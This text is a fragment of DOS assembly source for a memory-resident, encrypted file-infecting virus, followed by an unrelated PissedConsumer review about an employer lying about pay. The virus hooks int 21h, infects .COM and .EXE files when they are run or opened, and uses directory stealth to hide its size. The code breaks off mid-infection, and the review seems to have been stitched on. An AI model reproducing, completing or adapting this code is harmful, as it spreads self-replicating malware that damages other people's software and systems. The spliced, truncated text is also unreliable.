STAMP equ 30

MARKER equ 04D4Dh

code segment

org 0

assume cs:code,ds:code

start:

db 0E9h,3,0 ; to virus

host:

db 0CDh,20h,0 ; host program

virus_begin:

db 0BBh ; decryption module

code_offset dw offset virus_code

mov dx,VIRUS_SIZE / 2 + 1

decrypt:

db 02Eh,081h,07h ; ADD CS:[BX]

cipher dw 0

inc bx

inc bx

dec dx

jnz decrypt

virus_code:

call $ + 3 ; BP is instruction ptr.

pop bp

sub bp,offset $ - 1

push ds es

mov ax,PING ; test for residency

int 21h

cmp bx,PONG

je installed

mov ax,es ; Get PSP

dec ax

mov ds,ax ; Get MCB

sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64

sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64

mov es,word ptr ds:[12h]

push cs ; copy virus into memory

pop ds

xor di,di

mov si,bp

mov cx,(virus_end - start) / 2 + 1

rep movsw

xor ax,ax ; capture interrupts

mov ds,ax

sub word ptr ds:[413h],(MEM_SIZE+1023) / 1024

mov si,21h * 4 ; get original int 21

mov di,offset old_int_21

movsw

movsw

mov word ptr ds:[si - 4],offset new_int_21

mov ds:[si - 2],es ; and set new int 21

installed:

call activate ; activation routine

pop es ds ; restore segregs

cmp sp,MARKER ; check for .EXE

je exe_exit

com_exit:

lea si,[bp + host] ; restore host program

mov di,100h

push di

movsw

movsb

call fix_regs ; fix up registers

ret ; and leave

exe_exit:

mov ax,ds ; fix up return address

add ax,10h

add ax,cs:[bp + exe_cs]

mov cs:[bp + return_cs],ax

mov ax,cs:[bp + exe_ip]

mov cs:[bp + return_ip],ax

mov sp,[bp + exe_sp] ; restore SP

call fix_regs ; fix up registers

db 0EAh ; back to host program

return_ip dw 0

return_cs dw 0

exe_cs dw -16 ; orig CS:IP

exe_ip dw 103h

exe_sp dw -2 ; orig SP

fix_regs:

xor ax,ax

cwd

xor bx,bx

mov si,100h

xor di,di

ret

; interrupt 21 handler

int_21:

pushf

call dword ptr cs:[old_int_21]

ret

new_int_21:

cmp ax,PING ; residency test

je ping_pong

cmp ax,4B00h ; execute program

je execute

cmp ah,3Dh ; file open

je file_open

cmp ah,11h ; directory stealth

je dir_stealth

cmp ah,12h

je dir_stealth

int_21_exit:

db 0EAh ; never mind ...

old_int_21 dd 0

ping_pong:

mov bx,PONG

iret

dir_stealth:

call int_21 ; get dir entry

test al,al

js dir_stealth_done

push ax bx es

mov ah,2Fh

int 21h

cmp byte ptr es:[bx],-1 ; check for extended FCB

jne no_ext_FCB

add bx,7

no_ext_FCB:

mov ax,es:[bx + 17h] ; check for infection marker

and al,31

cmp al,STAMP

jne dir_fixed

sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3

sbb word ptr es:[bx + 1Fh],0

dir_fixed:

pop es bx ax

dir_stealth_done:

iret

file_open:

push ax cx di es

call get_extension

cmp [di],'OC' ; .COM file?

jne perhaps_exe ; perhaps .EXE then

cmp byte ptr [di + 2],'M'

jne not_prog

jmp a_program

perhaps_exe:

cmp [di],'XE' ; .EXE file?

jne not_prog

cmp byte ptr [di + 2],'E'

jne not_prog

a_program:

pop es di cx ax

jmp execute ; infect file

not_prog:

pop es di cx ax

jmp int_21_exit

execute:

push ax bx cx dx si di ds es

xor ax,ax ; critical error handler

mov es,ax ; routine - catch int 24

mov es:[24h * 4],offset int_24

mov es:[24h * 4 + 2],cs

mov ax,4300h ; change attributes

int 21h

push cx dx ds

xor cx,cx

call set_attributes

mov ax,3D02h ; open file

call int_21

jc cant_open

xchg bx,ax

push cs ; CS = DS

pop ds

mov ax,5700h ; save file date/time

int 21h

push cx dx

mov ah,3Fh

mov cx,28

mov dx,offset read_buffer

int 21h

cmp word ptr read_buffer,'ZM' ; .EXE?

je infect_exe ; yes, infect as .EXE

mov al,2 ; move to end of file

call move_file_ptr

cmp dx,65279 - (VIRUS_SIZE + 3)

ja dont_infect ; too big, don't infect

sub dx,VIRUS_SIZE + 3 ; check for previous infection

Guest

This company mis informed about the pay and what it actually does to get me to come in for an interview. Nothing but lies.

Good thing I did research and asked the right questions, I just don't understand why they lied to me over the phone. Don't be fooled is right.

View more comments (35)

Why Trust Reviews on PissedConsumer?

  • Professional auto and live moderation
  • 100% user-generated content
  • Equal opportunity and protection
  • Zero tolerance for fake reviews
  • Verified content
  • PissedConsumer is on the Inc. 5000 list

For more information read Blog article